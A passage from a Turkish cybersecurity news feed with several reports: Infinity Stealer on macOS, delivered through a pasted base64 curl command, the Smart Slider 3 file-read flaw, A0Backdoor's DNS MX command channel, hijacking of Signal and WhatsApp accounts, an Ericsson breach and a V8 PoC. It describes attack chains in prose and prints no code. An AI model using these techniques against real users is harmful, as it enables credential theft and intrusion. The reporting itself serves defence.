<p data-start="1066" data-end="1327">Araştırmacılar, zararlı yazılımın teknik yapısına ilişkin şu bilgileri paylaştı:<br data-start="1146" data-end="1149">“Nihai yük Python ile yazılıyor ve Nuitka kullanılarak derlenerek yerel bir macOS ikili dosyasına dönüştürülüyor. Bu durum, analiz edilmesini ve tespit edilmesini zorlaştırıyor.”</p>
<p data-start="1329" data-end="1510">Nuitka’nın Python kodunu C diline çevirerek <strong data-start="1373" data-end="1414">gerçek bir yerel uygulama oluşturduğu</strong>, bu sayede klasik yöntemlere göre <strong data-start="1449" data-end="1496">tersine mühendisliğin daha zor hale geldiği</strong> ifade edildi.</p>
<p data-start="1512" data-end="1545"><strong data-start="1512" data-end="1545">Saldırı zinciri nasıl işliyor</strong></p>
<p data-start="1547" data-end="1768">Saldırının, <strong data-start="1559" data-end="1581">update-check[.]com</strong> alan adı üzerinden başlatıldığı ve kullanıcıya sahte bir doğrulama adımı sunulduğu belirtildi. Kullanıcıdan, base64 ile gizlenmiş bir <strong data-start="1716" data-end="1757">curl komutunu Terminal’e yapıştırması</strong> isteniyor.</p>
<p data-start="1770" data-end="1808">Bu komutun çalıştırılmasıyla birlikte:</p>
<ul data-start="1810" data-end="2044">
<li data-section-id="1uk2nk8" data-start="1810" data-end="1873">
<p data-start="1812" data-end="1873">İkinci aşama zararlı yük sistemin geçici dizinine yazılıyor</p>
</li>
<li data-section-id="1y8yrer" data-start="1874" data-end="1908">
<p data-start="1876" data-end="1908">Karantina bayrağı kaldırılıyor</p>
</li>
<li data-section-id="jsmji0" data-start="1909" data-end="1955">
<p data-start="1911" data-end="1955">Zararlı yazılım arka planda çalıştırılıyor</p>
</li>
<li data-section-id="101fv21" data-start="1956" data-end="2000">
<p data-start="1958" data-end="2000">Komuta kontrol (C2) bilgileri iletiliyor</p>
</li>
<li data-section-id="1i6a9pr" data-start="2001" data-end="2044">
<p data-start="2003" data-end="2044">İzleri silmek için Terminal kapatılıyor</p>
</li>
</ul>
<p data-start="2046" data-end="2211">Son aşamada çalışan <strong data-start="2066" data-end="2086">Infinity Stealer</strong>, sistemde veri toplamaya başlamadan önce sanal ortam ve analiz araçlarını tespit etmeye yönelik kontroller gerçekleştiriyor.</p>
<p data-start="2213" data-end="2245"><strong data-start="2213" data-end="2245">Kritik verileri hedef alıyor</strong></p>
<p data-start="2247" data-end="2359">Zararlı yazılımın, kullanıcı sisteminden çok sayıda hassas veriyi toplayabildiği tespit edildi. Bunlar arasında:</p>
<ul data-start="2361" data-end="2538">
<li data-section-id="1vx7ft2" data-start="2361" data-end="2425">
<p data-start="2363" data-end="2425">Chromium tabanlı tarayıcılar ve Firefox’tan kimlik bilgileri</p>
</li>
<li data-section-id="kto80r" data-start="2426" data-end="2453">
<p data-start="2428" data-end="2453">macOS Keychain verileri</p>
</li>
<li data-section-id="v1iua9" data-start="2454" data-end="2480">
<p data-start="2456" data-end="2480">Kripto para cüzdanları</p>
</li>
<li data-section-id="1q7idks" data-start="2481" data-end="2538">
<p data-start="2483" data-end="2538">Geliştirici dosyalarındaki (.env) açık metin bilgiler</p>
</li>
</ul>
<p data-start="2540" data-end="2719">Toplanan verilerin <strong data-start="2559" data-end="2621">HTTP POST istekleriyle saldırgan sunucularına gönderildiği</strong>, ayrıca işlem tamamlandığında saldırganlara <strong data-start="2666" data-end="2708">Telegram üzerinden bildirim iletildiği</strong> aktarıldı.</p>
<p data-start="2721" data-end="2754"><strong data-start="2721" data-end="2754">“Terminal komutlarına dikkat”</strong></p>
<p data-start="2756" data-end="2999">Malwarebytes uzmanları, macOS platformuna yönelik tehditlerin giderek daha karmaşık hale geldiğine dikkat çekerek,<br data-start="2870" data-end="2873">“Kullanıcılar, internetten gördükleri ve tam olarak anlamadıkları komutları Terminal’e yapıştırmamalıdır.” uyarısında bulundu.</p>
<p data-start="3001" data-end="3162">Araştırmacılar, bu tür saldırıların artmasının, macOS sistemlerin de artık daha yoğun ve hedefli siber tehditlerle karşı karşıya olduğunu gösterdiğini vurguladı.</p>
<p data-start="3164" data-end="3312"><strong data-start="3164" data-end="3176"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>SMART SLIDER 3 AÇIĞI 500 BİNDEN FAZLA WORDPRESS SİTESİNİ SALDIRI RİSKİYLE KARŞI KARŞIYA BIRAKTI</title>
<link>https://www.ajansexpres.com.tr/smart-slider-3-acigi-500-binden-fazla-wordpress-sitesini-saldiri-riskiyle-karsi-karsiya-birakti</link>
<guid>https://www.ajansexpres.com.tr/smart-slider-3-acigi-500-binden-fazla-wordpress-sitesini-saldiri-riskiyle-karsi-karsiya-birakti</guid>
<description><![CDATA[ WordPress’in yaygın eklentilerinden Smart Slider 3’te tespit edilen kritik güvenlik açığı, düşük yetkili kullanıcıların sunucudaki hassas dosyalara erişmesine imkan tanıyor. 500 binden fazla sitenin hâlâ risk altında olduğu belirtilirken uzmanlar acil güncelleme çağrısı yaptı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69c9863937fb9.webp" length="50838" type="image/jpeg"/>
<pubDate>Sun, 29 Mar 2026 23:06:39 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>smart slider 3 açığı nedir, wordpress eklenti güvenlik açığı nasıl çalışır, cve-2026-3098 hangi siteleri etkiliyor, wordpress güvenlik güncellemesi nasıl yapılır</media:keywords>
<content:encoded><![CDATA[<p>WordPress altyapısında yaygın olarak kullanılan <strong data-start="470" data-end="501">Smart Slider 3 eklentisinde</strong> tespit edilen güvenlik açığı, yüz binlerce internet sitesini etkileyen ciddi bir risk oluşturdu. <strong data-start="599" data-end="616">CVE-2026-3098</strong> koduyla takip edilen açık sayesinde, yalnızca “abone” seviyesinde yetkiye sahip kullanıcıların bile sunucu üzerindeki kritik dosyalara erişebildiği bildirildi.</p>
<p></p>
<p data-start="778" data-end="1035">Güvenlik araştırmacısı <strong data-start="801" data-end="821">Dmitrii Ignatyev</strong> tarafından keşfedilen açık, eklentinin <strong data-start="861" data-end="899">3.5.1.33 ve önceki tüm sürümlerini</strong> kapsıyor. Açığın, eklentideki <strong data-start="930" data-end="1007">AJAX tabanlı dışa aktarma işlemlerinde yetki kontrolünün eksik olmasından</strong> kaynaklandığı ifade edildi.</p>
<p data-start="1037" data-end="1079"><strong data-start="1037" data-end="1079">“Herhangi bir dosya türü okunabiliyor”</strong></p>
<p data-start="1081" data-end="1427">WordPress güvenlik firması Defiant bünyesinde görev yapan araştırmacı <strong data-start="1151" data-end="1168">István Márton</strong>, açığın teknik boyutuna ilişkin şu değerlendirmeyi yaptı:<br data-start="1226" data-end="1229">“Bu fonksiyon, güvenlik açığı bulunan sürümde herhangi bir dosya türü ya da kaynak kontrolü içermiyor. Bu durum yalnızca görsellerin değil, .php dosyalarının da dışa aktarılabilmesine neden oluyor.”</p>
<p data-start="1429" data-end="1742">Márton, bu zafiyetin sonuçlarına dikkat çekerek,<br data-start="1477" data-end="1480">“Bu açık, düşük yetkili kullanıcıların bile sunucudaki herhangi bir dosyayı okuyabilmesini mümkün kılıyor. Özellikle wp-config.php dosyasına erişim, veritabanı kimlik bilgileri ve kriptografik anahtarların ele geçirilmesi anlamına geliyor.” ifadelerini kullandı.</p>
<p data-start="1744" data-end="1782"><strong data-start="1744" data-end="1782">500 binden fazla site risk altında</strong></p>
<p data-start="1784" data-end="2003">Smart Slider 3 eklentisinin dünya genelinde <strong data-start="1828" data-end="1877">800 binden fazla aktif kurulumda kullanıldığı</strong> belirtilirken, WordPress istatistiklerine göre <strong data-start="1925" data-end="1991">en az 500 bin sitenin hâlâ güncellenmemiş ve savunmasız olduğu</strong> kaydedildi.</p>
<p data-start="2005" data-end="2205">Açık, 23 Şubat’ta raporlanmasının ardından geliştirici firma <strong data-start="2066" data-end="2080">Nextendweb</strong> tarafından 2 Mart’ta doğrulandı. Soruna yönelik düzeltme ise <strong data-start="2142" data-end="2186">24 Mart’ta yayımlanan 3.5.1.34 sürümüyle</strong> kullanıma sunuldu.</p>
<p data-start="2207" data-end="2506">Uzmanlar, açığın henüz aktif olarak istismar edildiğine dair bir bulgu olmadığını ancak durumun hızla değişebileceğini vurguladı. Güvenlik araştırmacıları, site yöneticilerine yönelik olarak<br data-start="2397" data-end="2400">“Güncellemelerin geciktirilmesi, veri ihlali ve site ele geçirilmesi riskini artırır.” uyarısında bulundu.</p>
<p data-start="2508" data-end="2684"><strong data-start="2508" data-end="2520"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>MICROSOFT TEAMS ÜZERİNDEN YAPILAN FİŞİNG SALDIRILARINDA A0BACKDOOR MALWARE TESPİT EDİLDİ</title>
<link>https://www.ajansexpres.com.tr/microsoft-teams-uzerinden-yapilan-fising-saldirilarinda-a0backdoor-malware-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-teams-uzerinden-yapilan-fising-saldirilarinda-a0backdoor-malware-tespit-edildi</guid>
<description><![CDATA[ Siber güvenlik araştırmacıları, finans ve sağlık sektöründeki çalışanları hedef alan yeni bir Microsoft Teams odaklı kimlik avı kampanyasını açıkladı. Saldırganlar, Quick Assist üzerinden uzak erişim sağlayarak A0Backdoor adlı kötü amaçlı yazılımı dağıtıyor ve iletişimi DNS MX kayıtları üzerinden gizliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd9617f546.webp" length="77422" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:44:18 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>microsoft teams phishing saldırısı nedir, a0backdoor malware nasıl çalışır, quick assist ile uzaktan erişim saldırısı, dns mx tabanlı c2 iletişimi nedir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="448" data-end="451">Siber güvenlik şirketi BlueVoyant tarafından paylaşılan rapora göre, finans ve sağlık kurumlarındaki çalışanlar Microsoft Teams üzerinden hedef alınıyor. Saldırganlar, kullanıcının güvenini kazanmak için önce e-posta kutularını spam mesajlarla dolduruyor, ardından Teams üzerinden kendilerini şirketin BT personeli olarak tanıtarak yardım teklif ediyor.</p>
<p></p>
<p data-start="806" data-end="1155">Kurbanların bilgisayarına erişim sağlamak için saldırganlar <strong data-start="866" data-end="882">Quick Assist</strong> uzaktan erişim aracını kullanıyor ve bu oturum üzerinden dijital olarak imzalanmış <strong data-start="966" data-end="986">MSI yükleyiciler</strong> aracılığıyla A0Backdoor malware paketini kuruyor. Bu yükleyiciler, Microsoft Teams bileşenleri ve Phone Link uygulamasının CrossDeviceService aracı olarak maskeleniyor.</p>
<p data-start="1157" data-end="1199"><strong data-start="1157" data-end="1199">DLL Sideloading ve Shellcode Kullanımı</strong></p>
<p data-start="1201" data-end="1597">Kötü amaçlı kütüphane <strong data-start="1223" data-end="1238">hostfxr.dll</strong>, meşru Microsoft ikili dosyalarıyla birlikte yüklenerek DLL sideloading yöntemiyle çalıştırılıyor. Belleğe yüklendiğinde, kütüphane şifrelenmiş veya sıkıştırılmış veriyi çözüp <strong data-start="1415" data-end="1428">shellcode</strong> yürütüyor. Shellcode, sanal ortam ve sandbox kontrolleri yapıyor, ardından <strong data-start="1504" data-end="1535">SHA-256 tabanlı bir anahtar</strong> oluşturup AES ile şifrelenmiş A0Backdoor’u belleğe çıkarıyor.</p>
<p data-start="1599" data-end="1773">Malware, çekirdek rutinlerini çözüp Windows API çağrıları (DeviceIoControl, GetUserNameExW, GetComputerNameW) kullanarak sistem bilgisini topluyor ve hedef cihazı tanımlıyor.</p>
<p data-start="1775" data-end="1830"><strong data-start="1775" data-end="1830">Komut ve Kontrol İletişimi DNS Üzerinden Gizleniyor</strong></p>
<p data-start="1832" data-end="2233">A0Backdoor, C2 (Command-and-Control) iletişimini <strong data-start="1881" data-end="1901">DNS MX kayıtları</strong> üzerinden gerçekleştiriyor. Kötü amaçlı yazılım, yüksek entropili alt alan adlarıyla şifrelenmiş meta veriyi genel recursive DNS sunucularına gönderiyor. Sunucular, MX kayıtlarıyla şifrelenmiş komut verilerini geri iletiyor. BlueVoyant, bu yöntemin TXT tabanlı DNS tünelleme kontrollerinden kaçınmak için kullanıldığını belirtiyor.</p>
<p data-start="2235" data-end="2262"><strong data-start="2235" data-end="2262">Hedefler ve Bağlantılar</strong></p>
<p data-start="2264" data-end="2610">Araştırmacılar, kampanyanın hedefleri arasında Kanada’daki bir finans kuruluşu ve uluslararası bir sağlık kuruluşu olduğunu açıkladı. Rapor, kampanyanın BlackBasta fidye yazılım grubunun taktik ve tekniklerinin evrimleşmiş bir versiyonu olabileceğini öne sürüyor. Daha önce BlackBasta grubu iç sohbet kayıtlarının sızdırılması sonrası dağılmıştı.</p>
<p data-start="2612" data-end="2765">BlueVoyant, <strong data-start="2624" data-end="2719">imzalı MSI’ler, kötü amaçlı DLL’ler, A0Backdoor payload’u ve DNS MX tabanlı C2 iletişiminin</strong> bu kampanyada yeni öğeler olduğunu vurguladı.</p>
<p data-start="2767" data-end="2936"><strong data-start="2767" data-end="2779"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>HOLLANDA İSTİHBARATI SIGNAL VE WHATSAPP HESAPLARINI HEDEF ALAN KİMLİK AVI SALDIRILARI KONUSUNDA UYARDI</title>
<link>https://www.ajansexpres.com.tr/hollanda-istihbarati-signal-ve-whatsapp-hesaplarini-hedef-alan-kimlik-avi-saldirilari-konusunda-uyardi</link>
<guid>https://www.ajansexpres.com.tr/hollanda-istihbarati-signal-ve-whatsapp-hesaplarini-hedef-alan-kimlik-avi-saldirilari-konusunda-uyardi</guid>
<description><![CDATA[ Hollanda Savunma İstihbarat ve Güvenlik Servisi (MIVD) ile Genel İstihbarat ve Güvenlik Servisi (AIVD), Rusya bağlantılı siber aktörlerin Signal ve WhatsApp kullanıcılarını hedef alan kimlik avı kampanyaları yürüttüğünü açıkladı. Kampanyanın özellikle hükümet yetkilileri, askerî personel ve gazetecilerin hesaplarını ele geçirerek hassas mesajlara erişmeyi amaçladığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd9759510f.webp" length="75158" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:44:14 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>signal ve whatsapp hesap ele geçirme saldırısı nedir, signal phishing kampanyası nasıl çalışıyor, whatsapp device linking saldırısı nasıl yapılır, mesajlaşma uygulamalarında güvenlik nasıl sağlanır</media:keywords>
<content:encoded><![CDATA[<p><br data-start="535" data-end="538">Hollanda Savunma İstihbarat ve Güvenlik Servisi (MIVD) ile Hollanda Genel İstihbarat ve Güvenlik Servisi (AIVD), Signal ve WhatsApp kullanıcılarını hedef alan yeni bir siber casusluk kampanyasına ilişkin güvenlik uyarısı yayımladı. İstihbarat kurumları, Rusya destekli siber aktörlerin özellikle <strong data-start="834" data-end="890">hükümet yetkilileri, askerî personel ve gazetecileri</strong> hedef aldığını açıkladı.</p>
<p></p>
<p data-start="917" data-end="1238">Hollandalı yetkililer, saldırıların büyük ölçüde <strong data-start="966" data-end="1026">kimlik avı (phishing) ve sosyal mühendislik tekniklerine</strong> dayandığını ve uygulamaların meşru kimlik doğrulama özelliklerinin kötüye kullanıldığını belirtti. Bu yöntemle saldırganların hedef hesaplara erişim sağlayarak yeni mesajları gizlice takip edebildiği kaydedildi.</p>
<p data-start="1240" data-end="1572">Signal tarafından yapılan açıklamada ise platformun altyapısı veya uçtan uca şifreleme sisteminin ihlal edilmediği vurgulandı. Signal açıklamasında, “Hedefli kimlik avı saldırıları sonucu bazı kullanıcı hesaplarının ele geçirildiğine dair raporların farkındayız. Signal’in şifreleme altyapısı etkilenmemiştir.” ifadeleri kullanıldı.</p>
<p data-start="1574" data-end="1620"><strong data-start="1574" data-end="1620">Sahte Signal Destek Mesajları Kullanılıyor</strong></p>
<p data-start="1622" data-end="1913">Yetkililere göre saldırganların kullandığı yöntemlerden biri, kullanıcıları sahte bir <strong data-start="1708" data-end="1745">“Signal Security Support Chatbot”</strong> hesabı üzerinden kandırmak. Bu mesajlarda kullanıcılara cihazlarında şüpheli etkinlik tespit edildiği iddia edilerek doğrulama işlemi yapmaları gerektiği bildiriliyor.</p>
<p data-start="1915" data-end="2178">Sahte mesajda kullanıcıdan telefonuna gönderilen <strong data-start="1964" data-end="2012">SMS doğrulama kodu veya Signal PIN bilgisini</strong> paylaşması isteniyor. Bu bilgilerin paylaşılması durumunda saldırganların hesabı kendi cihazlarına kaydedebildiği ve hesabın kontrolünü ele geçirebildiği belirtildi.</p>
<p data-start="2180" data-end="2531">Hollanda istihbarat birimleri, saldırganların hesabı ele geçirdikten sonra <strong data-start="2255" data-end="2296">telefon numarasını değiştirebildiğini</strong>, böylece kullanıcının kişiler listesine ve gelen mesajlarına erişim sağlayabildiğini açıkladı. Ayrıca ele geçirilen hesap üzerinden başka kişilere mesaj gönderilerek kullanıcının kimliğine bürünülmesinin de mümkün olduğu ifade edildi.</p>
<p data-start="2533" data-end="2585"><strong data-start="2533" data-end="2585">QR Kod ve Cihaz Bağlama Özelliği de Kullanılıyor</strong></p>
<p data-start="2587" data-end="2859">Yetkililer ikinci saldırı yönteminde ise Signal ve WhatsApp’ın <strong data-start="2650" data-end="2684">cihaz bağlama (device linking)</strong> özelliğinin kötüye kullanıldığını belirtti. Saldırganlar hedef kişilere sahte bir sohbet daveti veya bağlantı gibi görünen <strong data-start="2808" data-end="2847">zararlı QR kodları veya bağlantılar</strong> gönderiyor.</p>
<p data-start="2861" data-end="3150">Kullanıcı bu QR kodunu taradığında veya bağlantıyı açtığında, saldırganın cihazı kurbanın hesabına bağlı bir cihaz olarak eklenebiliyor. Bu sayede saldırganların mesaj geçmişini okuyabildiği, sohbetleri gerçek zamanlı takip edebildiği ve kullanıcının adına mesaj gönderebildiği bildirildi.</p>
<p data-start="3152" data-end="3298">Uzmanlar, bu yöntemde hesap sahibinin erişiminin çoğu zaman devam ettiğini ve bu nedenle ihlalin fark edilmesinin daha zor olabildiğini vurguladı.</p>
<p data-start="3300" data-end="3347"><strong data-start="3300" data-end="3347">İstihbarat Kurumlarından Güvenlik Tavsiyesi</strong></p>
<p data-start="3349" data-end="3679">Hollanda istihbarat kurumları, kullanıcıların mesajlaşma uygulamalarında <strong data-start="3422" data-end="3508">hassas veya gizli bilgileri paylaşmadan önce kurum politikalarını kontrol etmeleri</strong> gerektiğini belirtti. Ayrıca Signal ve WhatsApp hesaplarında bağlı cihazların düzenli olarak kontrol edilmesi ve bilinmeyen cihazların derhal kaldırılması tavsiye edildi.</p>
<p data-start="3681" data-end="3903">Yetkililer ayrıca doğrulanmamış bağlantılar, QR kodları veya davet mesajlarına karşı dikkatli olunması gerektiğini belirterek bu tür mesajların mümkünse farklı bir güvenilir iletişim kanalı üzerinden doğrulanmasını önerdi.</p>
<p data-start="3905" data-end="4119"><strong data-start="3905" data-end="3917"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>ERICSSON ABD BİRİMİ HİZMET SAĞLAYICI HACK’İ SONRASI VERİ İHLALİNİ DUYURDU</title>
<link>https://www.ajansexpres.com.tr/ericsson-abd-birimi-hizmet-saglayici-hacki-sonrasi-veri-ihlalini-duyurdu</link>
<guid>https://www.ajansexpres.com.tr/ericsson-abd-birimi-hizmet-saglayici-hacki-sonrasi-veri-ihlalini-duyurdu</guid>
<description><![CDATA[ İsveç merkezli telekomünikasyon devi Ericsson’un ABD iştiraki Ericsson Inc., bir hizmet sağlayıcısının sistemlerinin siber saldırıya uğraması sonrası çalışanlara ve müşterilere ait kişisel verilerin ele geçirilmiş olabileceğini açıkladı. Yetkililer, olayın Nisan 2025’te gerçekleştiğini ve incelemenin Şubat 2026’da tamamlandığını bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd97979439.webp" length="68252" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:44:11 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>ericsson veri ihlali nedir, ericsson service provider hack olayı ne zaman gerçekleşti, ericsson veri sızıntısında hangi bilgiler etkilendi, ericsson kimlik koruma hizmeti nedir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="466" data-end="469">Telekomünikasyon ve ağ teknolojileri alanında faaliyet gösteren Ericsson’un ABD iştiraki <strong data-start="558" data-end="575">Ericsson Inc.</strong>, bir hizmet sağlayıcısının sistemlerine yönelik siber saldırı sonrası veri ihlali yaşandığını açıkladı. Şirket tarafından etkilenen kişilere gönderilen bildirim mektupları ve Kaliforniya Başsavcılığı’na yapılan resmi bildirimlerde, olay kapsamında çalışan ve müşterilere ait kişisel verilerin yetkisiz kişiler tarafından erişilmiş olabileceği belirtildi.</p>
<p></p>
<p data-start="932" data-end="1159">Merkezi İsveç’in Stockholm kentinde bulunan ve 1876 yılında kurulan Ericsson’un dünya genelinde yaklaşık <strong data-start="1037" data-end="1056">90 bin çalışanı</strong> bulunuyor. Şirket, küresel iletişim teknolojileri sektörünün önde gelen aktörleri arasında yer alıyor.</p>
<p data-start="1161" data-end="1211"><strong data-start="1161" data-end="1211">Saldırı Hizmet Sağlayıcı Üzerinden Gerçekleşti</strong></p>
<p data-start="1213" data-end="1600">Ericsson tarafından yapılan açıklamada, çalışan ve müşteri verilerini depolayan bir hizmet sağlayıcısının <strong data-start="1319" data-end="1377">28 Nisan 2025’te sistemlerinde bir ihlal tespit ettiği</strong> bildirildi. İhlalin tespit edilmesinin ardından ilgili sağlayıcının olayı <strong data-start="1452" data-end="1494">ABD Federal Soruşturma Bürosu’na (FBI)</strong> bildirdiği ve olayın kapsamını belirlemek için harici siber güvenlik uzmanlarıyla çalıştığı ifade edildi.</p>
<p data-start="1602" data-end="1971">Yürütülen inceleme sonucunda, bazı dosyalara <strong data-start="1647" data-end="1739">17 Nisan 2025 ile 22 Nisan 2025 tarihleri arasında yetkisiz erişim sağlanmış olabileceği</strong> tespit edildi. Ericsson açıklamasında, “Yapılan araştırma sonucunda hizmet sağlayıcımız, sınırlı sayıdaki bazı dosyalara yetkisiz erişim sağlanmış veya bu dosyaların ele geçirilmiş olabileceğini belirledi.” ifadelerine yer verildi.</p>
<p data-start="1973" data-end="2020"><strong data-start="1973" data-end="2020">Binlerce Kişinin Verisi Etkilenmiş Olabilir</strong></p>
<p data-start="2022" data-end="2244">Teksas Başsavcılığı’na yapılan ayrı bir bildirimde ise veri ihlalinin <strong data-start="2092" data-end="2150">yalnızca Teksas eyaletinde 4 bin 377 kişiyi etkilediği</strong> belirtildi. Olayın toplamda kaç kişiyi etkilediğine ilişkin ise resmi bir rakam paylaşılmadı.</p>
<p data-start="2246" data-end="2566">Yetkililer, ihlal kapsamında açığa çıkmış olabilecek bilgiler arasında <strong data-start="2317" data-end="2517">isim, adres, Sosyal Güvenlik numarası, ehliyet numarası, devlet tarafından verilen kimlik numaraları, finansal hesap bilgileri, kredi veya banka kartı numaraları, tıbbi bilgiler ve doğum tarihleri</strong> gibi hassas verilerin bulunabileceğini bildirdi.</p>
<p data-start="2568" data-end="2603"><strong data-start="2568" data-end="2603">Kimlik Koruma Hizmeti Sunulacak</strong></p>
<p data-start="2605" data-end="2889">Ericsson, olaydan etkilenmiş olabilecek kişilere <strong data-start="2654" data-end="2683">IDX kimlik koruma hizmeti</strong> sağlayacağını açıkladı. Bu kapsamda ücretsiz kredi izleme, karanlık web izleme, kimlik hırsızlığı kurtarma desteği ve <strong data-start="2802" data-end="2866">1 milyon dolara kadar kimlik dolandırıcılığı zarar sigortası</strong> sunulacağı bildirildi.</p>
<p data-start="2891" data-end="3016">Şirket, söz konusu hizmetten yararlanmak isteyen kişilerin <strong data-start="2950" data-end="2968">9 Haziran 2026</strong> tarihine kadar kayıt yaptırabileceğini duyurdu.</p>
<p data-start="3018" data-end="3059"><strong data-start="3018" data-end="3059">Saldırının Arkasında Kim Var Belirsiz</strong></p>
<p data-start="3061" data-end="3290">Ericsson, olayı veri hırsızlığı saldırısı olarak nitelendirirken saldırının arkasındaki siber suç grubuna ilişkin herhangi bir açıklama yapılmadı. Olayın ardından henüz hiçbir siber suç grubunun saldırıyı üstlenmediği belirtildi.</p>
<p data-start="3292" data-end="3478">Konuyla ilgili ek bilgi talebine yanıt veren Ericsson sözcüsü ise şirketin şu aşamada bildirim mektuplarında yer alan bilgiler dışında paylaşılacak ek bir detay bulunmadığını ifade etti.</p>
<p data-start="3480" data-end="3673"><strong data-start="3480" data-end="3492"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>CHROMIUM V8 MOTORUNDAKİ KRİTİK AÇIK İÇİN PoC YAYIMLANDI, GÜNCELLENMEYEN TARAYICILAR RİSK ALTINDA</title>
<link>https://www.ajansexpres.com.tr/chromium-v8-motorundaki-kritik-acik-icin-poc-yayimlandi-guncellenmeyen-tarayicilar-risk-altinda</link>
<guid>https://www.ajansexpres.com.tr/chromium-v8-motorundaki-kritik-acik-icin-poc-yayimlandi-guncellenmeyen-tarayicilar-risk-altinda</guid>
<description><![CDATA[ Google Chrome ve Chromium tabanlı tarayıcıları etkileyen CVE-2025-10891 numaralı güvenlik açığına ilişkin Proof-of-Concept (PoC) kodu yayımlandı. V8 JavaScript motorundaki integer overflow hatasından kaynaklanan açık, özel hazırlanmış içeriklerin işlenmesi sırasında bellek bozulmasına yol açabiliyor. Güvenlik güncellemesinin yayımlandığı belirtilirken, güncellenmeyen tarayıcı sürümlerinin risk altında olduğu ifade edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd97d2c628.webp" length="64812" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:44:04 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>chromium v8 güvenlik açığı nedir, cve-2025-10891 nasıl çalışır, chrome v8 integer overflow açığı hangi sürümleri etkiliyor, chrome güvenlik güncellemesi nasıl yapılır</media:keywords>
<content:encoded><![CDATA[<p><br data-start="574" data-end="577">Google Chrome ve Chromium tabanlı tarayıcılarda kullanılan V8 JavaScript motorunda tespit edilen kritik bir güvenlik açığı için Proof-of-Concept (PoC) kodu yayımlandı. CVE-2025-10891 olarak tanımlanan ve <strong data-start="781" data-end="793">CVSS 8.8</strong> puanıyla yüksek risk seviyesinde değerlendirilen açık, belirli koşullarda bellek bozulmasına yol açabiliyor.</p>
<p></p>
<p data-start="904" data-end="1197">Güvenlik analizlerine göre açık, V8 motorunda meydana gelen bir <strong data-start="968" data-end="988">integer overflow</strong> hatasından kaynaklanıyor. JavaScript kodlarının çalıştırılmasından sorumlu olan motorun, belirli sayısal değerlerin beklenen sınırları aşması durumunda hatalı bellek işlemleri gerçekleştirebildiği belirtildi.</p>
<p data-start="1199" data-end="1554">Uzmanlar, saldırganların özel olarak hazırlanmış içerikleri hedef sistemlere göndererek <strong data-start="1287" data-end="1313">heap memory corruption</strong> oluşturabileceğini ifade etti. Resmî güvenlik duyurularında açık doğrudan uzaktan kod çalıştırma (RCE) olarak sınıflandırılmasa da, bellek bozulmasının bazı saldırı senaryolarında daha ileri düzey istismarların önünü açabileceği kaydedildi.</p>
<p data-start="1556" data-end="1600"><strong data-start="1556" data-end="1600">Chromium Tabanlı Tarayıcılar Etkileniyor</strong></p>
<p data-start="1602" data-end="1868">Güvenlik açığının <strong data-start="1620" data-end="1748">Google Chrome, Microsoft Edge, Brave ve diğer Chromium tabanlı tarayıcıların 140.0.7339.207 sürümünden önceki versiyonlarını</strong> etkilediği bildirildi. Uzmanlar, PoC kodunun kamuya açık hâle gelmesinin saldırı riskini artırabileceğine dikkat çekti.</p>
<p data-start="1870" data-end="2063">Yayımlanan PoC’nin, güvenlik araştırmacılarının açığın teknik etkilerini analiz edebilmesine olanak sağladığı ancak aynı zamanda kötü niyetli aktörler tarafından da incelenebileceği belirtildi.</p>
<p data-start="2065" data-end="2090"><strong data-start="2065" data-end="2090">Güncelleme Yayımlandı</strong></p>
<p data-start="2092" data-end="2320">Google tarafından yayımlanan güvenlik güncellemesi ile söz konusu açığın <strong data-start="2165" data-end="2221">Chrome 140.0.7339.207 ve 140.0.7339.208 sürümlerinde</strong> giderildiği açıklandı. Kullanıcılara tarayıcılarını en kısa sürede güncellemeleri çağrısı yapıldı.</p>
<p data-start="2322" data-end="2565">Uzmanlar, güncelleme yapılmadığı sürece eski sürümlerin saldırılara açık kalabileceğini belirterek kullanıcıların <strong data-start="2436" data-end="2493">Ayarlar → Chrome Hakkında → Güncelle → Yeniden Başlat</strong> adımlarını izleyerek tarayıcılarını güncellemesi gerektiğini vurguladı.</p>
<p data-start="2567" data-end="2750"><strong data-start="2567" data-end="2579"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>GOOGLE CLOUD GEMINI API ANAHTARI SIZDIRILDI, 48 SAATTE 82 BİN DOLARLIK FATURA OLUŞTU</title>
<link>https://www.ajansexpres.com.tr/google-cloud-gemini-api-anahtari-sizdirildi-48-saatte-82-bin-dolarlik-fatura-olustu</link>
<guid>https://www.ajansexpres.com.tr/google-cloud-gemini-api-anahtari-sizdirildi-48-saatte-82-bin-dolarlik-fatura-olustu</guid>
